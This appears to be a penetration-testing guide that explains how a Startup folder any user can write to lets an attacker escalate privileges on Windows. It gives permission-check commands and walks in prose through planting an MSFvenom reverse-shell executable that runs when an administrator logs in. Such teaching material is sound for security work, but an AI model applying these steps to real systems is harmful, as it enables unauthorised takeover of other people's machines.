Guides, Privilege Escalation, Windows

Windows Privilege Escalation – Startup Applications

Introduction

Windows allows users to set specific applications to automatically start whenever a user authenticates, by placing their executables in a directory designed specifically for startup programs. Although this feature can be very handy, if startup programs are set up with improper permissions it may allow attackers to escalate privileges, as these programs are executed in the context of the user who is logging in at that point in time.

Identifying the Vulnerability

Startup applications that are executed when all users (including administrators) authenticate are usually stored in the following directory:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

The first step is to verify whether the current user has write access to the directory so that a malicious executable can be placed in it. Icacls or Accesschk can be used to identify the permissions of a specific folder or file:

icacls [directory/file]
Accesschk.exe -accepteula -wuqv [file]

Judging by the output from the commands above, it appears that everyone on the system has access to write to the path, which means it can be exploited.

Automated enumeration scripts such as WinPEAS can also help identify weak Autorun programs. Additionally, the Sysinternals Autorunsc for Windows tool can also be used to do so:

Exploiting the Vulnerability

All that is left now is to place a malicious executable that will execute a reverse shell in the startup directory, to force the system to execute it the next time an administrator user logs in.

The first step is to generate some shellcode using MSFvenom with the following flags:

  • -p to specify the payload type, in this case, the Windows TCP reverse shell
  • LHOST to specify the localhost IP address to connect to
  • LPORT to specify the local port to connect to
  • -f to specify the format for the shell, in this case, exe

Then transferring shell.exe file to the Windows victim machine using the Python web server and the Windows Certutil utility, placing it in the directory mentioned above:

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

The following screenshot shows FreeRDP being used to simulate an administrator user logging in:

Once the “admin” administrator user has logged on, the malicious executable was executed, therefore granting a reverse shell as that user:

Conclusion

Although Startup applications can be a great tool in Windows to help be more efficient, they should be configured carefully, only allowing administrator users to edit files stored in the startup path, as exploiting this misconfiguration could result in a full system compromise.